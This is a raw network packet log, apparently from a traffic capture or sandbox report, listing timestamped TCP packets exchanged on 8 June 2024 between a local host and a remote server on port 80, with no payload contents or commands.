Jun 8, 2024 20:22:06.549017906 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549036026 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549072027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549093008 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549105883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549129963 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549140930 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549168110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549175024 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549200058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549209118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549216986 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549245119 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549264908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549280882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549299955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549314976 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549339056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549351931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549361944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549386978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549407959 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549422979 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549441099 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549457073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549475908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549493074 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549514055 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549525976 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549536943 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549580097 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549763918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549799919 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549823046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549834013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549846888 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549870014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549887896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549904108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549922943 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549938917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549957991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.549973965 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.549993992 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.550010920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.550034046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.550040960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.550071001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.550091028 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.662228107 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.667860031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.911427021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.911477089 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.911514044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.911549091 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.911583900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.911626101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.911645889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.911645889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.911645889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.911662102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.911683083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.911695957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.911725044 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.911732912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.911756039 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.911771059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.911776066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.911802053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.911823988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.911837101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.911856890 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.911870956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.911890984 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.911905050 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.911920071 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.911938906 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.911956072 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.911973953 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.911990881 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912009001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.912024021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912056923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912168980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.912204981 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.912226915 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912239075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.912270069 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912278891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.912290096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912308931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.912332058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912343025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.912350893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912378073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.912393093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912415028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.912429094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912467003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912539959 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.912574053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.912591934 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912607908 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.912631035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912642956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.912652969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912677050 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.912694931 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912714958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.912723064 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912765026 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912836075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.912870884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.912887096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912916899 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.912997961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.913031101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.913062096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.913064957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.913084030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.913100958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.913120031 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.913136005 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.913155079 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.913172960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.913194895 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.913229942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.913387060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.913419008 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.913449049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.913451910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.913470030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.913489103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.913506985 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.913523912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.913542032 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.913558006 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.913577080 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.913592100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.913609982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.913625956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.913649082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.913660049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.913671970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.913697004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.913723946 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.913760900 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.913959026 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.913992882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914016008 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914026976 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914055109 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914062023 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914082050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914096117 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914117098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914129972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914145947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914165020 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914185047 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914200068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914222956 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914233923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914253950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914268017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914289951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914304018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914328098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914339066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914365053 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914371967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914386988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914402008 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914427996 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914437056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914452076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914472103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914493084 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914505959 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914534092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914551973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914870024 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914920092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914925098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914958000 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.914984941 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.914993048 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915004969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915028095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915046930 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915062904 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915083885 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915096998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915105104 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915132046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915149927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915165901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915185928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915198088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915215015 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915231943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915249109 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915267944 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915286064 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915302038 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915326118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915335894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915357113 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915369987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915394068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915405035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915431023 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915438890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915455103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915473938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915496111 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915518999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915734053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915766954 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915791988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915800095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915821075 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915833950 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915849924 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915885925 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915891886 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915919065 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915941954 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915952921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.915978909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.915988922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916008949 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916023970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916043997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916058064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916074038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916093111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916110039 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916126966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916147947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916161060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916184902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916197062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916204929 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916232109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916253090 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916264057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916282892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916325092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916656017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916690111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916708946 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916724920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916752100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916759968 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916779041 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916812897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916815042 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916846991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916872025 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916877031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916907072 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916912079 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916929007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916945934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.916968107 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.916980028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.917001963 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.917013884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.917037010 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.917047977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.917069912 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.917083025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.917093039 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.917117119 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.917135000 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.917150021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.917171001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.917184114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.917207003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.917218924 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.917243004 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.917253017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.917265892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.917308092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.917699099 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.917735100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.917752981 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.917769909 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.917788029 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.917804956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.917820930 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.917840004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.917862892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.917872906 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.917886972 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.917907953 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.917927027 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.917942047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.917963028 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.917975903 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918004990 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918008089 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918025970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918037891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918060064 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918071985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918082952 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918106079 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918128967 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918139935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918159962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918173075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918189049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918207884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918222904 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918242931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918267965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918298006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918623924 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918674946 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918678999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918713093 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918732882 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918746948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918756962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918780088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918792009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918809891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918827057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918827057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918843985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918859005 CEST	80	49731	23.88.106.134	192.168.2.4
